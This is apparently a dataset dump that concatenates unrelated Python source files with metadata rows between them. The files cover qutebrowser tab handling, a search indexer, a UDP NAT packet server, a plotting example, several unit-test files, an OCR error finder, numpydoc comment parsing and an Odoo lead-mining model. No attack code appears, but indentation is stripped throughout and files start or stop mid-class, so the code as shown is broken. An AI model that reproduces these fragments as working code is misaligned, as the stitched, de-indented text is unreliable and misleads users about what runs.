@pyqtSlot()
def _leave_modes_on_load(self):
"""Leave insert/hint mode when loading started."""
try:
url = self.current_url()
if not url.isValid():
url = None
except qtutils.QtValueError:
url = None
if config.instance.get('input.insert_mode.leave_on_load',
url=url):
modeman.leave(self._win_id, usertypes.KeyMode.insert,
'load started', maybe=True)
else:
log.modes.debug("Ignoring leave_on_load request due to setting.")
if config.cache['hints.leave_on_load']:
modeman.leave(self._win_id, usertypes.KeyMode.hint,
'load started', maybe=True)
else:
log.modes.debug("Ignoring leave_on_load request due to setting.")
@pyqtSlot(browsertab.AbstractTab, str)
def _on_title_changed(self, tab, text):
"""Set the title of a tab.
Slot for the title_changed signal of any tab.
Args:
tab: The WebView where the title was changed.
text: The text to set.
"""
if not text:
log.webview.debug("Ignoring title change to '{}'.".format(text))
return
try:
idx = self._tab_index(tab)
except TabDeletedError:
# We can get signals for tabs we already deleted...
return
log.webview.debug("Changing title for idx {} to '{}'".format(
idx, text))
self.widget.set_page_title(idx, text)
if idx == self.widget.currentIndex():
self._update_window_title()
@pyqtSlot(browsertab.AbstractTab, QUrl)
def _on_url_changed(self, tab, url):
"""Set the new URL as title if there's no title yet.
Args:
tab: The WebView where the title was changed.
url: The new URL.
"""
try:
idx = self._tab_index(tab)
except TabDeletedError:
# We can get signals for tabs we already deleted...
return
if not self.widget.page_title(idx):
self.widget.set_page_title(idx, url.toDisplayString())
@pyqtSlot(browsertab.AbstractTab, QIcon)
def _on_icon_changed(self, tab, icon):
"""Set the icon of a tab.
Slot for the iconChanged signal of any tab.
Args:
tab: The WebView where the title was changed.
icon: The new icon
"""
if not tab.data.should_show_icon():
return
try:
idx = self._tab_index(tab)
except TabDeletedError:
# We can get signals for tabs we already deleted...
return
self.widget.setTabIcon(idx, icon)
if config.val.tabs.tabs_are_windows:
self.widget.window().setWindowIcon(icon)
@pyqtSlot(usertypes.KeyMode)
def on_mode_entered(self, mode):
"""Save input mode when tabs.mode_on_change = restore."""
if (config.val.tabs.mode_on_change == 'restore' and
mode in modeman.INPUT_MODES):
tab = self.widget.currentWidget()
if tab is not None:
tab.data.input_mode = mode
@pyqtSlot(usertypes.KeyMode)
def on_mode_left(self, mode):
"""Give focus to current tab if command mode was left."""
widget = self.widget.currentWidget()
if widget is None:
return # type: ignore
if mode in [usertypes.KeyMode.command] + modeman.PROMPT_MODES:
log.modes.debug("Left status-input mode, focusing {!r}".format(
widget))
widget.setFocus()
if config.val.tabs.mode_on_change == 'restore':
widget.data.input_mode = usertypes.KeyMode.normal
@pyqtSlot(int)
def _on_current_changed(self, idx):
"""Add prev tab to stack and leave hinting mode when focus changed."""
mode_on_change = config.val.tabs.mode_on_change
if idx == -1 or self.shutting_down:
# closing the last tab (before quitting) or shutting down
return
tab = self.widget.widget(idx)
if tab is None:
log.webview.debug( # type: ignore
"on_current_changed got called with invalid index {}"
.format(idx))
return
log.modes.debug("Current tab changed, focusing {!r}".format(tab))
tab.setFocus()
modes_to_leave = [usertypes.KeyMode.hint, usertypes.KeyMode.caret]
mm_instance = modeman.instance(self._win_id)
current_mode = mm_instance.mode
log.modes.debug("Mode before tab change: {} (mode_on_change = {})"
.format(current_mode.name, mode_on_change))
if mode_on_change == 'normal':
modes_to_leave += modeman.INPUT_MODES
for mode in modes_to_leave:
modeman.leave(self._win_id, mode, 'tab changed', maybe=True)
if (mode_on_change == 'restore' and
current_mode not in modeman.PROMPT_MODES):
modeman.enter(self._win_id, tab.data.input_mode, 'restore')
if self._now_focused is not None:
self.tab_deque.on_switch(self._now_focused)
log.modes.debug("Mode after tab change: {} (mode_on_change = {})"
.format(current_mode.name, mode_on_change))
self._now_focused = tab
self.current_tab_changed.emit(tab)
QTimer.singleShot(0, self._update_window_title)
self._tab_insert_idx_left = self.widget.currentIndex()
self._tab_insert_idx_right = self.widget.currentIndex() + 1
@pyqtSlot()
def on_cmd_return_pressed(self):
"""Set focus when the commandline closes."""
log.modes.debug("Commandline closed, focusing {!r}".format(self))
def _on_load_progress(self, tab, perc):
"""Adjust tab indicator on load progress."""
try:
idx = self._tab_index(tab)
except TabDeletedError:
# We can get signals for tabs we already deleted...
return
start = config.cache['colors.tabs.indicator.start']
stop = config.cache['colors.tabs.indicator.stop']
system = config.cache['colors.tabs.indicator.system']
color = utils.interpolate_color(start, stop, perc, system)
self.widget.set_tab_indicator_color(idx, color)
self.widget.update_tab_title(idx)
if idx == self.widget.currentIndex():
self._update_window_title()
def _on_load_finished(self, tab, ok):
"""Adjust tab indicator when loading finished."""
try:
idx = self._tab_index(tab)
except TabDeletedError:
# We can get signals for tabs we already deleted...
return
if ok:
start = config.cache['colors.tabs.indicator.start']
stop = config.cache['colors.tabs.indicator.stop']
system = config.cache['colors.tabs.indicator.system']
color = utils.interpolate_color(start, stop, 100, system)
else:
color = config.cache['colors.tabs.indicator.error']
self.widget.set_tab_indicator_color(idx, color)
if idx == self.widget.currentIndex():
tab.private_api.handle_auto_insert_mode(ok)
@pyqtSlot()
def _on_scroll_pos_changed(self):
"""Update tab and window title when scroll position changed."""
idx = self.widget.currentIndex()
if idx == -1:
# (e.g. last tab removed)
log.webview.debug("Not updating scroll position because index is "
"-1")
return
self._update_window_title('scroll_pos')
self.widget.update_tab_title(idx, 'scroll_pos')
def _on_audio_changed(self, tab, _muted):
"""Update audio field in tab when mute or recentlyAudible changed."""
try:
idx = self._tab_index(tab)
except TabDeletedError:
# We can get signals for tabs we already deleted...
return
self.widget.update_tab_title(idx, 'audio')
if idx == self.widget.currentIndex():
self._update_window_title('audio')
def _on_renderer_process_terminated(self, tab, status, code):
"""Show an error when a renderer process terminated."""
if status == browsertab.TerminationStatus.normal:
return
messages = {
browsertab.TerminationStatus.abnormal:
"Renderer process exited with status {}".format(code),
browsertab.TerminationStatus.crashed:
"Renderer process crashed",
browsertab.TerminationStatus.killed:
"Renderer process was killed",
browsertab.TerminationStatus.unknown:
"Renderer process did not start",
}
msg = messages[status]
def show_error_page(html):
tab.set_html(html)
log.webview.error(msg)
if qtutils.version_check('5.9', compiled=False):
url_string = tab.url(requested=True).toDisplayString()
error_page = jinja.render(
'error.html', title="Error loading {}".format(url_string),
url=url_string, error=msg)
QTimer.singleShot(100, lambda: show_error_page(error_page))
else:
# WORKAROUND for https://bugreports.qt.io/browse/QTBUG-58698
message.error(msg)
self._remove_tab(tab, crashed=True)
if self.widget.count() == 0:
self.tabopen(QUrl('about:blank'))
def resizeEvent(self, e):
"""Extend resizeEvent of QWidget to emit a resized signal afterwards.
Args:
e: The QResizeEvent
"""
super().resizeEvent(e)
self.resized.emit(self.geometry())
def wheelEvent(self, e):
"""Override wheelEvent of QWidget to forward it to the focused tab.
Args:
e: The QWheelEvent
"""
if self._now_focused is not None:
self._now_focused.wheelEvent(e)
else:
e.ignore()
def set_mark(self, key):
"""Set a mark at the current scroll position in the current tab.
Args:
key: mark identifier; capital indicates a global mark
"""
# strip the fragment as it may interfere with scrolling
try:
url = self.current_url().adjusted(QUrl.RemoveFragment)
except qtutils.QtValueError:
# show an error only if the mark is not automatically set
if key != "'":
message.error("Failed to set mark: url invalid")
return
point = self.widget.currentWidget().scroller.pos_px()
if key.isupper():
self._global_marks[key] = point, url
else:
if url not in self._local_marks:
self._local_marks[url] = {}
self._local_marks[url][key] = point
def jump_mark(self, key):
"""Jump to the mark named by `key`.
Args:
key: mark identifier; capital indicates a global mark
"""
try:
# consider urls that differ only in fragment to be identical
urlkey = self.current_url().adjusted(QUrl.RemoveFragment)
except qtutils.QtValueError:
urlkey = None
tab = self.widget.currentWidget()
if key.isupper():
if key in self._global_marks:
point, url = self._global_marks[key]
def callback(ok):
"""Scroll once loading finished."""
if ok:
self.cur_load_finished.disconnect(callback)
tab.scroller.to_point(point)
self.load_url(url, newtab=False)
self.cur_load_finished.connect(callback)
else:
message.error("Mark {} is not set".format(key))
elif urlkey is None:
message.error("Current URL is invalid!")
elif urlkey in self._local_marks and key in self._local_marks[urlkey]:
point = self._local_marks[urlkey][key]
# save the pre-jump position in the special ' mark
# this has to happen after we read the mark, otherwise jump_mark
# "'" would just jump to the current position every time
tab.scroller.before_jump_requested.emit()
tab.scroller.to_point(point)
else:
message.error("Mark {} is not set".format(key))
| gpl-3.0 | -6,031,515,982,452,400,000 | 38.555126 | 79 | 0.583081 | false |
academic-colab/maslo-server | FTS.py | 1 | 5261 | #!/usr/bin/env python
'''
/******************************************************************************
* FTS.py
*
* Copyright (c) 2011-2012, Academic ADL Co-Lab, University of Wisconsin-Extension
* http://www.academiccolab.org/
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public
* License as published by the Free Software Foundation; either
* version 3 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
* MA 02110-1301 USA
*****************************************************************************/
'''
import sys
import os
import json
import urllib2
import re
import sqlite3 as dbs
## Reads a json file and returns a json object
def getJSON(path, isRelative=True):
if isRelative :
fPath = path + "/manifest"
else :
fPath = path
try :
f = open(fPath)
except :
print "File ", fPath, " cannot be opened."
return None
else :
data = json.load(f)
f.close()
return data
## Strip string passed as argument from common stopwords
def removeStopWords(text):
stopwords = ""
try :
f = open("stopwords.txt", "r")
except :
f = urllib2.urlopen('http://www.textfixer.com/resources/common-english-words.txt')
stopwords = f.read()
f = open("stopwords.txt", "w")
f.write(stopwords)
f.close()
else :
stopwords = f.read()
f.close()
stopwords = stopwords.strip().split(",")
for stopword in stopwords :
pattern = re.compile(r"\b%s\b"%stopword, re.IGNORECASE)
text = pattern.sub("", text)
pattern = re.compile("[\s]+")
text = pattern.sub(" ", text)
return text
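## Editor's note: an illustrative sketch added by the editor, not part of the
## original script. Assuming stopwords.txt contains "is,a,of,the", the filter
## above behaves roughly like:
##   removeStopWords("this is a test of the filter") -> "this test filter"
## (exact spacing depends on the whitespace-collapsing regex).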
## Create full text search table for pack contents
def createTable(db):
statement = "CREATE VIRTUAL TABLE content_search using FTS3(pack,section,content,tokenize=porter);"
try :
db.execute(statement)
db.commit()
except:
pass
## Create basic content pack table
def createTableUpper(db):
statement = "CREATE TABLE content (pack text, path text, version text, author text, public int DEFAULT 0, category text);"
try :
db.execute(statement)
db.commit()
except:
pass
## insert data into content pack tables - FTS and basic
def insertData(pack, path, db, zipName=None, versionPath=None, author=None):
data = getJSON(path)
query = "INSERT INTO content_search(pack, section, content) VALUES (?,?,?)"
query2 = "INSERT INTO content(pack, path, version, author, category) VALUES (?,?,?,?,?)"
if zipName :
version = "0"
category = ""
authorVal = ""
if versionPath is not None and author is not None :
print versionPath
versionData = getJSON(versionPath, False)
if versionData and "version" in versionData :
version = versionData["version"]
if versionData and "category" in versionData :
category = versionData["category"]
authorVal = author
try :
zn = zipName.replace("qDir-", "")
db.execute(query2, (pack.decode('utf-8'), zn.decode('utf-8'),version, authorVal.decode('utf-8'), category))
except Exception, e:
print "Insert failed: ",pack, zn, version, authorVal
print e
pass
pattern = re.compile("<[^>]+>")
print data
for entry in data :
title = entry["title"]
normalTitle = removeStopWords(title)
try :
db.execute(query, (pack.decode('utf-8'), title, normalTitle,))
except Exception, e:
print "error:", e
return
text = None
uPath = path.decode('utf-8')
if entry["type"] == "text" :
newPath = uPath+"/../"+entry["path"]
f = open(newPath)
text = f.read().strip()
f.close()
else :
newPath = uPath+"/../"+ entry["path"]+".dsc"
try :
f = open(newPath)
text = f.read().strip()
f.close()
except :
pass
if text is not None:
text = text.decode('utf-8')
text = pattern.sub(" ", text)
text = removeStopWords(text)
try :
db.execute(query, (pack.decode('utf-8'), title, text,))
except Exception, e:
print "error:", e
return
db.commit()
## Create tables if they don't exist, index argument-passed content pack, create database entries
def main(pathToManifest, PackName, pathToGlobalSearch=None, zipName=None, versionPath=None, author=None):
db = dbs.connect(pathToManifest+"/search.db")
createTable(db)
insertData(PackName, pathToManifest, db)
db.close()
if (pathToGlobalSearch) :
db = dbs.connect(pathToGlobalSearch+"/search.db")
createTable(db)
createTableUpper(db)
insertData(PackName, pathToManifest, db, zipName,versionPath, author)
db.close()
## And now ... get to work.
if __name__ == "__main__" :
path = sys.argv[1]
pack = sys.argv[2]
globalDb = None
zipName = None
versionPath = None
author = None
if len(sys.argv) > 3 :
globalDb = sys.argv[3]
if len(sys.argv) > 4 :
zipName = sys.argv[4]
if len(sys.argv) > 5 :
versionPath = sys.argv[5]
author = sys.argv[6]
main(path, pack, globalDb, zipName, versionPath, author)
| gpl-3.0 | 3,676,473,972,005,454,000 | 27.437838 | 123 | 0.657099 | false |
madformuse/server | server/natpacketserver.py | 1 | 1848 | import socket
from server.subscribable import Subscribable
from .decorators import with_logger
@with_logger
class NatPacketServer(Subscribable):
def __init__(self, loop, port):
super().__init__()
self.loop = loop
self.port = port
self._logger.debug("{id} Listening on {port}".format(id=id(self), port=port))
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', port))
s.setblocking(False)
loop.add_reader(s.fileno(), self._recv)
self._socket = s
self._subscribers = {}
def close(self):
        self.loop.remove_reader(self._socket.fileno())
try:
self._socket.shutdown(socket.SHUT_RDWR)
except OSError as ex:
self._logger.exception(ex)
finally:
self._socket.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def _recv(self):
try:
data, addr = self._socket.recvfrom(512)
self._logger.debug("Received UDP {} from {}".format(data, addr))
if data[0] == 0x8:
self._logger.debug("Emitting with: {} {} {} ".format(data[1:].decode(),
addr[0], addr[1]))
self.notify({
'command_id': 'ProcessServerNatPacket',
'arguments': ["{}:{}".format(addr[0], addr[1]), data[1:].decode()]
})
self._socket.sendto(b"\x08OK", addr)
except OSError as ex:
if ex.errno == socket.EWOULDBLOCK:
pass
else:
self._logger.critical(ex)
raise ex
except Exception as ex:
self._logger.critical(ex)
raise ex
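# Editor's note: a minimal client-side sketch added by the editor (not part
# of the original module) for exercising the protocol above: datagrams start
# with the byte 0x08 followed by the payload, and the server replies with
# b"\x08OK". Host and port values are assumptions for illustration.
def send_nat_packet(host, port, payload):
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    client.settimeout(1.0)
    try:
        # Prefix the payload with the 0x08 marker the server looks for.
        client.sendto(b"\x08" + payload, (host, port))
        reply, _ = client.recvfrom(512)  # expected to be b"\x08OK"
        return reply
    finally:
        client.close()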
| gpl-3.0 | -7,447,576,450,279,924,000 | 31.421053 | 87 | 0.523268 | false |
PierreRaybaut/PythonQwt | doc/symbol_path_example.py | 1 | 1089 | from qtpy import QtWidgets as QW
from qtpy import QtGui as QG
from qtpy import QtCore as QC
import qwt
import numpy as np
import os.path as osp
app = QW.QApplication([])
# --- Construct custom symbol ---
path = QG.QPainterPath()
path.moveTo(0, 8)
path.lineTo(0, 5)
path.lineTo(-3, 5)
path.lineTo(0, 0)
path.lineTo(3, 5)
path.lineTo(0, 5)
transform = QG.QTransform()
transform.rotate(-30.0)
path = transform.map(path)
pen = QG.QPen(QC.Qt.black, 2)
pen.setJoinStyle(QC.Qt.MiterJoin)
symbol = qwt.QwtSymbol()
symbol.setPen(pen)
symbol.setBrush(QC.Qt.red)
symbol.setPath(path)
symbol.setPinPoint(QC.QPointF(0.0, 0.0))
symbol.setSize(10, 14)
# --- Test it within a simple plot ---
curve = qwt.QwtPlotCurve()
curve_pen = QG.QPen(QC.Qt.blue)
curve_pen.setStyle(QC.Qt.DotLine)
curve.setPen(curve_pen)
curve.setSymbol(symbol)
x = np.linspace(0, 10, 10)
curve.setData(x, np.sin(x))
plot = qwt.QwtPlot()
curve.attach(plot)
plot.resize(600, 300)
plot.replot()
plot.show()
plot.grab().save(
osp.join(osp.abspath(osp.dirname(__file__)), "images", "symbol_path_example.png")
)
app.exec_()
| lgpl-2.1 | -1,333,490,536,816,966,100 | 19.166667 | 85 | 0.708907 | false |
rossweinstein/Evolutionary-Computing-Python | src/main/Main.py | 1 | 1131 | from src.ecSystem.ECSystem import ECSystem
from src.ecSystem.ECSystemParameters import ECSystemParameters
# Where we actually run our EC System
params = ECSystemParameters()
# Governs the number of expressions in each generation
params.generation_size = 200
# Governs the length of the expressions in the initial population
params.genome_size = 15
# The percentage of the population selected for the next generation
params.fitness_threshold = 0.2
# If our fitness is not improving over this set number of generations, the EC System reboots
params.stagnation_threshold = 30
# The percentage of the population selected for mutation
params.mutation_percentage = .1
# Minimum fitness value required for the system to deem the expression equivalent to training data
params.success_threshold = 0.01
# Training Data: The x and y values used to evaluate the expression's fitness
params.x_training_data = [-55.0, -35.0, -11.0, -1.0, 1.0, 19.0, 87.0, 101.0]
params.y_training_data = [1512.0, 612.0, 60, 0.0, 0.0, 180.0, 3784, 5100.0]
ec_system = ECSystem(params)
ec_system.run_ec_system()
# System results
print(ec_system.stats)
| mit | 5,219,184,992,717,285,000 | 32.264706 | 98 | 0.769231 | false |
emsrc/daeso-dutch | test/graph/test_alpinograph.py | 1 | 3993 | """
test AlpinoGraph class
"""
import unittest
from daeso_nl.graph.alpinograph import AlpinoGraph
class Test_AlpinoGraph(unittest.TestCase):
def setUp(self):
self.ag = AlpinoGraph(root="0")
self.ag.add_node("0", "top", cat="top",
tokens="Ik wilde weten of hij echt begrip had .".split())
self.ag.add_node("1", "smain", cat="smain",
tokens="Ik wilde weten of hij echt begrip had".split())
self.ag.add_node("2", "pron", pos="pron", root="ik", index="1",
tokens="Ik".split())
self.ag.add_node("3", "verb", pos="verb", root="willen",
tokens="wilde".split())
self.ag.add_node("4", "inf", cat="inf",
tokens="weten of hij echt begrip had".split())
self.ag.add_node("5", "index", index="1")
self.ag.add_node("6", "verb", pos="verb", root="weten",
tokens="weten".split())
self.ag.add_node("7", "cp", cat="cp",
tokens="of hij echt begrip had".split())
self.ag.add_node("8", "comp", pos="comp", root="of",
tokens="of".split())
self.ag.add_node("9", "ssub", cat="ssub",
tokens="hij echt begrip had".split())
self.ag.add_node("10", "pron", pos="pron", root="hij",
tokens="hij".split())
self.ag.add_node("11", "np", cat="np",
tokens="echt begrip".split())
self.ag.add_node("12", "adj", pos="adj", root="echt",
tokens="echt".split())
self.ag.add_node("13", "noun", pos="noun", root="begrip",
tokens="begrip".split())
self.ag.add_node("14", "verb", pos="verb", root="hebben",
tokens="had".split())
self.ag.add_node("15", "punt", pos="punct", root=".",
tokens=".".split())
self.ag.add_edge("0", "1", "--")
self.ag.add_edge("1", "2", "su")
self.ag.add_edge("1", "3", "hd")
self.ag.add_edge("1", "4", "vc")
self.ag.add_edge("4", "5", "su")
self.ag.add_edge("4", "6", "hd")
self.ag.add_edge("4", "7", "vc")
self.ag.add_edge("7", "8", "cmp")
self.ag.add_edge("7", "9", "body")
self.ag.add_edge("9", "10", "su")
self.ag.add_edge("9", "11", "obj1")
self.ag.add_edge("11", "12", "mod")
self.ag.add_edge("11", "13", "hd")
self.ag.add_edge("9", "14", "hd")
self.ag.add_edge("0", "15", "punct")
def test_print_subtree(self):
print "\n", self.ag
def test_node_is_nominal(self):
self.assertTrue(self.ag.node_is_nominal("13"))
self.assertFalse(self.ag.node_is_nominal("3"))
def test_node_is_punct(self):
self.assertTrue(self.ag.node_is_punct("15"))
self.assertFalse(self.ag.node_is_punct("14"))
def test_node_is_index(self):
self.assertTrue(self.ag.node_is_index("5"))
self.assertFalse(self.ag.node_is_index("1"))
self.assertFalse(self.ag.node_is_index("2"))
def test_get_root_node(self):
self.assertEqual(self.ag.root, "0")
def test_get_parent_node(self):
self.assertEqual(self.ag.get_parent_node("0"), None)
self.assertEqual(self.ag.get_parent_node("1"), "0")
def test_get_node_deprel(self):
self.assertEqual(self.ag.get_node_deprel("0"), None)
self.assertEqual(self.ag.get_node_deprel("15"), "punct")
def test_node_is_complement(self):
self.assertTrue(self.ag.node_is_complement("11"))
self.assertFalse(self.ag.node_is_complement("12"))
if __name__ == '__main__':
import sys
sys.argv.append("-v")
unittest.main() | gpl-3.0 | 2,313,637,707,813,854,000 | 35.309091 | 82 | 0.488104 | false |
Azure/azure-sdk-for-python | sdk/formrecognizer/azure-ai-formrecognizer/tests/test_content_type.py | 1 | 2199 | # coding=utf-8
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
import pytest
from azure.ai.formrecognizer._helpers import get_content_type
from testcase import FormRecognizerTest
class TestContentType(FormRecognizerTest):
def test_pdf(self):
with open(self.invoice_pdf, "rb") as fd:
content_type = get_content_type(fd)
self.assertEqual(content_type, "application/pdf")
def test_pdf_bytes(self):
with open(self.invoice_pdf, "rb") as fd:
myfile = fd.read()
content_type = get_content_type(myfile)
self.assertEqual(content_type, "application/pdf")
def test_jpg(self):
with open(self.form_jpg, "rb") as fd:
content_type = get_content_type(fd)
self.assertEqual(content_type, "image/jpeg")
def test_jpg_bytes(self):
with open(self.form_jpg, "rb") as fd:
myfile = fd.read()
content_type = get_content_type(myfile)
self.assertEqual(content_type, "image/jpeg")
def test_png(self):
with open(self.receipt_png, "rb") as fd:
content_type = get_content_type(fd)
self.assertEqual(content_type, "image/png")
def test_png_bytes(self):
with open(self.receipt_png, "rb") as fd:
myfile = fd.read()
content_type = get_content_type(myfile)
self.assertEqual(content_type, "image/png")
def test_tiff_little_endian(self):
with open(self.invoice_tiff, "rb") as fd:
content_type = get_content_type(fd)
self.assertEqual(content_type, "image/tiff")
def test_tiff_little_endian_bytes(self):
with open(self.invoice_tiff, "rb") as fd:
myfile = fd.read()
content_type = get_content_type(myfile)
self.assertEqual(content_type, "image/tiff")
def test_tiff_big_endian(self):
content_type = get_content_type(b"\x4D\x4D\x00\x2A")
self.assertEqual(content_type, "image/tiff")
def test_bmp(self):
content_type = get_content_type(b"\x42\x4D\x00\x00")
self.assertEqual(content_type, "image/bmp")
| mit | 7,771,993,828,312,063,000 | 33.359375 | 61 | 0.606185 | false |
tung18tht/ICDAR-2017-Post-OCR-Correction | errors_detection/find_suspicious_eng_words.py | 1 | 1754 | import os, linecache, re, json
work_directory_path = os.path.dirname(os.path.realpath(__file__))
eng_words_file = open(work_directory_path + "/eng_words.txt", "rU")
eng_words = set()
for word in eng_words_file:
eng_words |= {word.rstrip()}
data_directory_path = work_directory_path + "/ICDAR2017_datasetPostOCR_Evaluation_2M_v1.2"
eng_data_directory_paths = [data_directory_path + "/eng_monograph", data_directory_path + "/eng_periodical"]
output_file = open(work_directory_path + "/Results/result_eng_words.json", "w")
output_file.write("{")
for eng_data_directory_path in eng_data_directory_paths:
for root_path, directories, files in os.walk(eng_data_directory_path):
for file in files:
if os.path.splitext(file)[1] == ".txt":
output_file.write("\n \""+os.path.basename(root_path)+"/"+file+"\": ")
errors = {}
file_path = root_path + "/" + file
ocr_output = linecache.getline(file_path, 1)[14:].strip()
word_begin_index = 0
for i, character in enumerate(ocr_output):
if character == ' ':
word_end_index = i
clean_word = re.sub('\W+', '', ocr_output[word_begin_index:word_end_index].lower())
if clean_word not in eng_words:
errors[str(word_begin_index)+":1"] = {}
word_begin_index = word_end_index + 1
clean_word = re.sub('\W+', '', ocr_output[word_begin_index:].lower())
if clean_word not in eng_words:
errors[str(word_begin_index)+":1"] = {}
output_file.write(json.dumps(errors, indent=8)+",")
output_file.seek(0, 2)
output_file.truncate(output_file.tell() - 1)
output_file = open(work_directory_path + "/Results/result_eng_words.json", "a")
output_file.write("\n}") | mit | 7,360,763,077,504,529,000 | 36.340426 | 108 | 0.622007 | false |
loli/medpy | doc/numpydoc/numpydoc/comment_eater.py | 1 | 5357 |
import sys
if sys.version_info[0] >= 3:
    from io import StringIO
else:
    from StringIO import StringIO
import compiler  # note: the 'compiler' module exists in Python 2 only
import inspect
import textwrap
import tokenize
from .compiler_unparse import unparse
class Comment(object):
""" A comment block.
"""
is_comment = True
def __init__(self, start_lineno, end_lineno, text):
# int : The first line number in the block. 1-indexed.
self.start_lineno = start_lineno
# int : The last line number. Inclusive!
self.end_lineno = end_lineno
# str : The text block including '#' character but not any leading spaces.
self.text = text
def add(self, string, start, end, line):
""" Add a new comment line.
"""
self.start_lineno = min(self.start_lineno, start[0])
self.end_lineno = max(self.end_lineno, end[0])
self.text += string
def __repr__(self):
return '%s(%r, %r, %r)' % (self.__class__.__name__, self.start_lineno,
self.end_lineno, self.text)
class NonComment(object):
""" A non-comment block of code.
"""
is_comment = False
def __init__(self, start_lineno, end_lineno):
self.start_lineno = start_lineno
self.end_lineno = end_lineno
def add(self, string, start, end, line):
""" Add lines to the block.
"""
if string.strip():
# Only add if not entirely whitespace.
self.start_lineno = min(self.start_lineno, start[0])
self.end_lineno = max(self.end_lineno, end[0])
def __repr__(self):
return '%s(%r, %r)' % (self.__class__.__name__, self.start_lineno,
self.end_lineno)
class CommentBlocker(object):
""" Pull out contiguous comment blocks.
"""
def __init__(self):
# Start with a dummy.
self.current_block = NonComment(0, 0)
# All of the blocks seen so far.
self.blocks = []
# The index mapping lines of code to their associated comment blocks.
self.index = {}
def process_file(self, file):
""" Process a file object.
"""
        if sys.version_info[0] >= 3:
            nxt = file.__next__
        else:
            nxt = file.next
for token in tokenize.generate_tokens(nxt):
self.process_token(*token)
self.make_index()
def process_token(self, kind, string, start, end, line):
""" Process a single token.
"""
if self.current_block.is_comment:
if kind == tokenize.COMMENT:
self.current_block.add(string, start, end, line)
else:
self.new_noncomment(start[0], end[0])
else:
if kind == tokenize.COMMENT:
self.new_comment(string, start, end, line)
else:
self.current_block.add(string, start, end, line)
def new_noncomment(self, start_lineno, end_lineno):
""" We are transitioning from a noncomment to a comment.
"""
block = NonComment(start_lineno, end_lineno)
self.blocks.append(block)
self.current_block = block
def new_comment(self, string, start, end, line):
""" Possibly add a new comment.
Only adds a new comment if this comment is the only thing on the line.
Otherwise, it extends the noncomment block.
"""
prefix = line[:start[1]]
if prefix.strip():
# Oops! Trailing comment, not a comment block.
self.current_block.add(string, start, end, line)
else:
# A comment block.
block = Comment(start[0], end[0], string)
self.blocks.append(block)
self.current_block = block
def make_index(self):
""" Make the index mapping lines of actual code to their associated
prefix comments.
"""
for prev, block in zip(self.blocks[:-1], self.blocks[1:]):
if not block.is_comment:
self.index[block.start_lineno] = prev
def search_for_comment(self, lineno, default=None):
""" Find the comment block just before the given line number.
Returns None (or the specified default) if there is no such block.
"""
if not self.index:
self.make_index()
block = self.index.get(lineno, None)
text = getattr(block, 'text', default)
return text
def strip_comment_marker(text):
""" Strip # markers at the front of a block of comment text.
"""
lines = []
for line in text.splitlines():
lines.append(line.lstrip('#'))
text = textwrap.dedent('\n'.join(lines))
return text
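# Editor's note: a doctest-style illustration added by the editor:
#
#     >>> strip_comment_marker("# alpha\n# beta")
#     'alpha\nbeta'
#
# Leading '#' markers are stripped, then the common indentation is removed.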
def get_class_traits(klass):
""" Yield all of the documentation for trait definitions on a class object.
"""
# FIXME: gracefully handle errors here or in the caller?
source = inspect.getsource(klass)
cb = CommentBlocker()
cb.process_file(StringIO(source))
mod_ast = compiler.parse(source)
class_ast = mod_ast.node.nodes[0]
for node in class_ast.code.nodes:
# FIXME: handle other kinds of assignments?
if isinstance(node, compiler.ast.Assign):
name = node.nodes[0].name
rhs = unparse(node.expr).strip()
doc = strip_comment_marker(cb.search_for_comment(node.lineno, default=''))
yield name, rhs, doc
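# Editor's note: a hedged usage sketch added by the editor. Because
# get_class_traits() relies on the Python-2-only 'compiler' module, this is
# only expected to work under Python 2; 'klass' is any class whose source
# carries comment blocks above its trait assignments.
def print_class_traits(klass):
    # Print one "name = rhs  # doc" line per trait definition.
    for name, rhs, doc in get_class_traits(klass):
        print('%s = %s  # %s' % (name, rhs, doc.strip()))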
| gpl-3.0 | -5,297,312,438,764,370,000 | 30.698225 | 86 | 0.581296 | false |
jeremiahyan/odoo | addons/crm_iap_lead/models/crm_iap_lead_mining_request.py | 1 | 15651 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import logging
from odoo import api, fields, models, _
from odoo.addons.iap.tools import iap_tools
from odoo.exceptions import UserError
_logger = logging.getLogger(__name__)
DEFAULT_ENDPOINT = 'https://iap-services.odoo.com'
MAX_LEAD = 200
MAX_CONTACT = 5
CREDIT_PER_COMPANY = 1
CREDIT_PER_CONTACT = 1
class CRMLeadMiningRequest(models.Model):
_name = 'crm.iap.lead.mining.request'
_description = 'CRM Lead Mining Request'
def _default_lead_type(self):
if self.env.user.has_group('crm.group_use_lead'):
return 'lead'
else:
return 'opportunity'
def _default_country_ids(self):
return self.env.user.company_id.country_id
name = fields.Char(string='Request Number', required=True, readonly=True, default=lambda self: _('New'), copy=False)
state = fields.Selection([('draft', 'Draft'), ('error', 'Error'), ('done', 'Done')], string='Status', required=True, default='draft')
# Request Data
lead_number = fields.Integer(string='Number of Leads', required=True, default=3)
search_type = fields.Selection([('companies', 'Companies'), ('people', 'Companies and their Contacts')], string='Target', required=True, default='companies')
error_type = fields.Selection([
('credits', 'Insufficient Credits'),
('no_result', 'No Result'),
], string='Error Type', readonly=True)
# Lead / Opportunity Data
lead_type = fields.Selection([('lead', 'Leads'), ('opportunity', 'Opportunities')], string='Type', required=True, default=_default_lead_type)
display_lead_label = fields.Char(compute='_compute_display_lead_label')
team_id = fields.Many2one(
'crm.team', string='Sales Team', ondelete="set null",
domain="[('use_opportunities', '=', True)]", readonly=False, compute='_compute_team_id', store=True)
user_id = fields.Many2one('res.users', string='Salesperson', default=lambda self: self.env.user)
tag_ids = fields.Many2many('crm.tag', string='Tags')
lead_ids = fields.One2many('crm.lead', 'lead_mining_request_id', string='Generated Lead / Opportunity')
